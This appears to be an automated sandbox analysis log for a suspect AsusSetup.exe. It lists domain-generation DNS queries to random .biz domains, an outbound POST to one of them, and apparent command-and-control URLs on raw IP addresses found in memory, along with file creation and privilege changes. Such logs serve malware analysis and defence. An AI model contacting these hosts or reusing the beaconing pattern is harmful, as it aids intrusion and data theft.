Source: global trafficDNS traffic detected: DNS query: oflybfv.biz
Source: global trafficDNS traffic detected: DNS query: yhqqc.biz
Source: global trafficDNS traffic detected: DNS query: mnjmhp.biz
Source: global trafficDNS traffic detected: DNS query: opowhhece.biz
Source: global trafficDNS traffic detected: DNS query: zjbpaao.biz
Source: global trafficDNS traffic detected: DNS query: jdhhbs.biz
Source: global trafficDNS traffic detected: DNS query: mgmsclkyu.biz
Source: global trafficDNS traffic detected: DNS query: warkcdu.biz
Source: global trafficDNS traffic detected: DNS query: gcedd.biz
Source: global trafficDNS traffic detected: DNS query: jwkoeoqns.biz
Source: global trafficDNS traffic detected: DNS query: xccjj.biz
Source: global trafficDNS traffic detected: DNS query: hehckyov.biz
Source: global trafficDNS traffic detected: DNS query: rynmcq.biz
Source: global trafficDNS traffic detected: DNS query: uaafd.biz
Source: global trafficDNS traffic detected: DNS query: eufxebus.biz
Source: global trafficDNS traffic detected: DNS query: pwlqfu.biz
Source: global trafficDNS traffic detected: DNS query: rrqafepng.biz
Source: global trafficDNS traffic detected: DNS query: ctdtgwag.biz
Source: global trafficDNS traffic detected: DNS query: tnevuluw.biz
Source: global trafficDNS traffic detected: DNS query: whjovd.biz
Source: global trafficDNS traffic detected: DNS query: gjogvvpsf.biz
Source: global trafficDNS traffic detected: DNS query: reczwga.biz
Source: global trafficDNS traffic detected: DNS query: bghjpy.biz
Source: global trafficDNS traffic detected: DNS query: damcprvgv.biz
Source: global trafficDNS traffic detected: DNS query: ocsvqjg.biz
Source: global trafficDNS traffic detected: DNS query: ywffr.biz
Source: global trafficDNS traffic detected: DNS query: ecxbwt.biz
Source: global trafficDNS traffic detected: DNS query: pectx.biz
Source: global trafficDNS traffic detected: DNS query: zyiexezl.biz
Source: global trafficDNS traffic detected: DNS query: banwyw.biz
Source: global trafficDNS traffic detected: DNS query: muapr.biz
Source: global trafficDNS traffic detected: DNS query: wxgzshna.biz
Source: global trafficDNS traffic detected: DNS query: zrlssa.biz
Source: global trafficDNS traffic detected: DNS query: jlqltsjvh.biz
Source: global trafficDNS traffic detected: DNS query: xyrgy.biz
Source: global trafficDNS traffic detected: DNS query: htwqzczce.biz
Source: global trafficDNS traffic detected: DNS query: kvbjaur.biz
Source: global trafficDNS traffic detected: DNS query: uphca.biz
Source: global trafficDNS traffic detected: DNS query: fjumtfnz.biz
Source: global trafficDNS traffic detected: DNS query: hlzfuyy.biz
Source: global trafficDNS traffic detected: DNS query: rffxu.biz
Source: global trafficDNS traffic detected: DNS query: cikivjto.biz
Source: unknown
HTTP traffic detected: POST /tqhhuuvd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 798
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 28 Oct 2024 15:37:43 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 28 Oct 2024 15:37:53 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Mon, 28 Oct 2024 15:38:18 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 28 Oct 2024 15:38:49 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: alg.exe, 00000002.00000003.2408163435.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2419686924.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2421030426.000000000054C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34:80/jfrndoN
Source: alg.exe, 00000002.00000003.2408163435.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2431141671.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2242965828.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2250640541.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2347309628.0000000000561000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2421030426.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2434579846.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2382821166.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2343746769.0000000000561000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2410586771.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2223285252.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2288526929.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2364566236.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2367385189.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2331458279.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2278014771.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2289940896.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2419686924.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2299023378.000000000055F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2241493433.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 
00000002.00000003.2260827027.000000000055E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/cmntnmriuw
Source: alg.exe, 00000002.00000003.2343746769.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2347309628.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2364566236.000000000054C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45:80/yyjnpedbcl
Source: alg.exe, 00000002.00000003.2115106603.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2123146582.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2088524007.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2098701280.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2080435303.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2097510796.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160:80/cxtfkubsyhri
Source: alg.exe, 00000002.00000003.2156726854.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2157221824.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2174197488.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2166050081.0000000000549000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2174993099.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2165632802.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2157885847.0000000000549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200:80/ckfgkmbjfmpkxgrrobat
Source: AsusSetup.exe, 00000000.00000003.1740569192.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1739817164.0000000000579000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.0000000000582000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1740569192.0000000000581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/
Source: AsusSetup.exe, 00000000.00000003.1740569192.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.00000000005EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/6
Source: AsusSetup.exe, 00000000.00000003.1740569192.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.00000000005EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/b
Source: alg.exe, 00000002.00000003.1761654612.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1761362905.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1760951972.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/rdbyhsstwxr
Source: alg.exe, 00000002.00000003.2260497253.000000000056B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/vbtgsklxqvsc
Source: AsusSetup.exe, 00000000.00000003.1739817164.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.00000000005AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/ywrwbyxrs
Source: AsusSetup.exe, 00000000.00000003.1741822854.0000000000543000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742304366.0000000000543000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/ywrwbyxrs$9
Source: AsusSetup.exe, 00000000.00000003.1739817164.0000000000579000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.0000000000582000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1740569192.0000000000581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/ywrwbyxrsH
Source: alg.exe, 00000002.00000003.1791243483.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1761654612.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1793031401.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1753864187.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1776391888.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1776573627.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1761362905.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1775486594.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1760951972.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/beqepswmsyxaQ
Source: alg.exe, 00000002.00000003.1760951972.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/rdbyhsstwxr
Source: alg.exe, 00000002.00000003.2261855756.000000000054A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2260827027.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2278014771.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/vbtgsklxqvscP
Source: alg.exe, 00000002.00000003.2123146582.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/wfwpk
Source: alg.exe, 00000002.00000003.2069250906.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2088524007.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2053760882.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2080435303.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2037434352.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/ywkdmkysrijolmojP
Source: AsusSetup.exe, 00000000.00000003.1739817164.00000000005BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/ywrwbyxrs
Source: alg.exe, 00000002.00000003.2013243358.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/
Source: alg.exe, 00000002.00000003.2013243358.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/1.
Source: alg.exe, 00000002.00000003.2013243358.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/B
Source: alg.exe, 00000002.00000003.2013243358.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/ngs
Source: alg.exe, 00000002.00000003.2013243358.000000000050C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2013243358.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/shm
Source: alg.exe, 00000002.00000003.2013243358.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/shmT
Source: alg.exe, 00000002.00000003.2013243358.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/shmywcqoq
Source: alg.exe, 00000002.00000003.2382821166.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2364566236.000000000054C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/jkvhfxewyayfhg
Source: alg.exe, 00000002.00000003.2014132101.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2013455899.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2030058504.0000000000548000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2029468928.0000000000548000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2037434352.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2012540214.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/shm
Source: AsusSetup.exe, 00000000.00000003.1739817164.0000000000579000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.0000000000582000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1740569192.0000000000581000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1722483049.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
Source: alg.exe, 00000002.00000003.1749198316.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/P
Source: alg.exe, 00000002.00000003.1722913142.000000000052E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1722380386.000000000052B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1722483049.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/fnkotvtiwfwjvbky
Source: alg.exe, 00000002.00000003.1722483049.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/fnkotvtiwfwjvbkyu
Source: alg.exe, 00000002.00000003.1749198316.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/gs
Source: alg.exe, 00000002.00000003.2188489063.0000000000528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ibecst
Source: alg.exe, 00000002.00000003.1749198316.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ils
Source: alg.exe, 00000002.00000003.1749198316.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ilssc
Source: alg.exe, 00000002.00000003.2223285252.000000000052D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/mrsvwgseskwgtcO
Source: AsusSetup.exe, 00000000.00000003.1712883179.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1712795088.00000000005C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/tqhhuuvd
Source: alg.exe, 00000002.00000003.2156726854.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2146856016.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2157221824.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2136321596.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2177767483.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2174197488.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2166050081.0000000000549000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2189192585.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2174993099.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2178627316.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2147112358.0000000000549000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2188489063.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2165632802.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2157885847.0000000000549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/arnrrfwlvkgxeufdP
Source: alg.exe, 00000002.00000003.2213279383.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2212486448.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2189192585.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2199212734.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2188489063.000000000054B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/ibecst
Source: alg.exe, 00000002.00000003.1749535217.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1749090181.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1761654612.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1753864187.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1761362905.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1749623717.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1760951972.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/ils
Source: alg.exe, 00000002.00000003.2251645473.000000000054A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2223981210.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2241493433.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2242965828.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2240825317.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2223285252.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2250640541.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/mrsvwgseskwgtcP
Source: AsusSetup.exe, 00000000.00000003.1739817164.00000000005BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/y
Source: AsusSetup.exe, 00000000.00000003.1738814075.00000000005BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/yn
Source: alg.exe, 00000002.00000003.2013243358.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
Source: alg.exe, 00000002.00000003.1953864686.000000000052D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/lxjfxiwwkxywcqoq
Source: alg.exe, 00000002.00000003.1994916519.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2014132101.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1953864686.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1996719983.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2013455899.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2012540214.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/lxjfxiwwkxywcqoq
Source: alg.exe, 00000002.00000003.1878501372.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/saedqhwkiyelcofi
Source: alg.exe, 00000002.00000003.1994916519.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1996719983.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/uswmbyvknw
Source: alg.exe, 00000002.00000003.1913904405.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1914838133.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/wxhqgp
Source: AsusSetup.exe, 00000000.00000003.1739817164.0000000000579000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.0000000000582000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1740569192.0000000000581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cvgrf.biz/E
Source: jucheck.exe.2.drString found in binary or memory: http://es5.github.io/#x15.4.4.21
Source: jucheck.exe.2.drString found in binary or memory: http://java.sun.com
Source: jucheck.exe.2.drString found in binary or memory: http://java.sun.comnot
Source: jucheck.exe.2.drString found in binary or memory: http://stackoverflow.com/a/1465386/4224163
Source: jucheck.exe.2.drString found in binary or memory: http://stackoverflow.com/a/15123777)
Source: jucheck.exe.2.drString found in binary or memory: http://stackoverflow.com/questions/1026069/capitalize-the-first-letter-of-string-in-javascript
Source: jucheck.exe.2.drString found in binary or memory: http://stackoverflow.com/questions/1068834/object-comparison-in-javascript
Source: Aut2exe_x64.exe.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/
Source: Aut2exe_x64.exe.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/8
Source: jucheck.exe.2.drString found in binary or memory: http://www.computerhope.com/forum/index.php?topic=76293.0
Source: officesvcmgr.exe.2.drString found in binary or memory: http://www.openssl.org/support/faq.html
Source: officesvcmgr.exe.2.drString found in binary or memory: http://www.openssl.org/support/faq.htmlerror
Source: jucheck.exe.2.drString found in binary or memory: http://www.tutorialspoint.com/javascript/array_map.htm
Source: alg.exe, 00000002.00000003.1834070146.0000000001640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
Source: officesvcmgr.exe.2.drString found in binary or memory: https://clients.config.office.net/manage/v1.0/serviceabilitymanager/MsaDeviceTokenMsaLastUpdatedMsaE
Source: notification_helper.exe.2.drString found in binary or memory: https://clients2.google.com/cr/report
Source: notification_helper.exe.2.drString found in binary or memory: https://clients2.google.com/cr/report..
Source: alg.exe, 00000002.00000003.1944752315.0000000001650000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: alg.exe, 00000002.00000003.1945427316.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1945270930.0000000001650000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: jucheck.exe.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/Reduce
Source: jucheck.exe.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/filter
Source: jucheck.exe.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/indexOf
Source: jucheck.exe.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/Trim
Source: jucheck.exe.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith
Source: jucheck.exe.2.drString found in binary or memory: https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith
Source: alg.exe, 00000002.00000003.2263748821.0000000001470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com/config/v2/OfficeFA000000
Source: msedge_proxy.exe.2.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
Source: msedge_proxy.exe.2.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
Source: jucheck.exe.2.drString found in binary or memory: https://javadl-esd-secure.oracle.com/update/%s/map-%s.xml
Source: jucheck.exe.2.drString found in binary or memory: https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xml
Source: jucheck.exe.2.drString found in binary or memory: https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xmlhttps://javadl-esd-secure.oracle.com/upda
Source: officesvcmgr.exe.2.drString found in binary or memory: https://nexusrules.officeapps.live.comhttps://nexus.officeapps.live.com/nexus/upload//nexus/rulesX-M
Source: officesvcmgr.exe.2.drString found in binary or memory: https://otelrules.azureedge.net/rules/UniversaliOSFailed
Source: officesvcmgr.exe.2.dr Binary or memory string: RegisterRawInputDevices memstr_699cfc83-b
Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\26169d80e67cd874.bin
Source: C:\Users\user\Desktop\AsusSetup.exe Code function: 0_2_02092ED0
Source: C:\Windows\System32\AppVClient.exe Code function: 6_2_00562ED0
Source: C:\Windows\System32\FXSSVC.exe Code function: 9_2_00452ED0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 10_2_02282ED0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Load Driver
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Security
Source: AsusSetup.exe Static PE information: Resource name: DLL type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: AsusSetup.exe Static PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: 117.0.5938.132_chrome_installer.exe.2.dr Static PE information: Resource name: B7 type: 7-zip archive data, version 0.4
Source: 117.0.5938.132_chrome_installer.exe.2.dr Static PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
Source: Acrobat.exe.2.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: SingleClientServicesUpdater.exe.2.dr Static PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
Source: SingleClientServicesUpdater.exe0.2.dr Static PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
